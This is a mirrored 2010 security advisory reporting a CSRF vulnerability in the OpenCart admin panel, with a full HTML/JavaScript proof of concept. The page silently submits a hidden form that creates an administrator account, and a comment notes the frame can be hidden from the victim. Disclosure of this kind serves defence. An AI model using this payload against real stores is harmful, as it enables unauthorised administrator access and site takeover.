Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:23162
HistoryFeb 04, 2010 - 12:00 a.m.

OpenCart CSRF Vulnerability

2010-02-0400:00:00
vulners.com
50
JSON

Advisory Information:

Title: OpenCart CSRF Vulnerability
Advisory URL:
http://blog.visionsource.org/2010/01/28/opencart-csrf-vulnerability/
Date published: 2010-01-28
Vendors contacted: OpenCart
Security Risk: High

Vulnerability Description:

OpenCart is vulnerable to CSRF attacks using the POST method. It is possible to craft a malicious page that will create an administrator user when the victim,
who is logged into OpenCart, visits the malicious page.

Proofs of Concept:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>OpenCart CSRF Vulnerability</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<script type="text/javascript">
function csrfInjection()
{
var params = {
'username' : 'an_attacker',
'firstname' : 'attack',
'lastname' : 'user',
'email' : '[email protected]',
'user_group_id' : '1', //Default group id for administrator level is 1
'password' : 'test',
'confirm' : 'test',
'status' : '1'
};

                    var form = document.createElement&#40;&quot;form&quot;&#41;;
                    form.setAttribute&#40;&quot;method&quot;, &quot;post&quot;&#41;;
                    form.setAttribute&#40;&quot;action&quot;, document.getElementById&#40;&#39;site_url&#39;&#41;.value + &quot;/index.php?route=user/user/insert&quot;&#41;;

                    for&#40;var key in params&#41; {
                            var hiddenField = document.createElement&#40;&quot;input&quot;&#41;;
                            hiddenField.setAttribute&#40;&quot;type&quot;, &quot;hidden&quot;&#41;;
                            hiddenField.setAttribute&#40;&quot;name&quot;, key&#41;;
                            hiddenField.setAttribute&#40;&quot;value&quot;, params[key]&#41;;

                            form.appendChild&#40;hiddenField&#41;;
                    }

                    attack_result.document.body.appendChild&#40;form&#41;;
                    form.submit&#40;&#41;;
            }
    &lt;/script&gt;

</head>
<body>
OpenCart CSRF Vulnerability

    &lt;input type=&quot;text&quot; name=&quot;site_url&quot; id=&quot;site_url&quot; size=&quot;50&quot; /&gt;/index.php?route=user/user/insert&lt;br /&gt;
    &lt;a href=&quot;#&quot; onclick=&quot;csrfInjection&#40;&#41;;return false;&quot;&gt;Add User&lt;/a&gt;

    &lt;p&gt;Results: &#40;this frame can be hidden so the user never knows the attack was performed&#41;&lt;/p&gt;
    &lt;iframe id=&quot;attack_result&quot; name=&quot;attack_result&quot; width=&quot;600&quot; height=&quot;600&quot;&gt;&lt;/iframe&gt;

</body>
</html>

JSON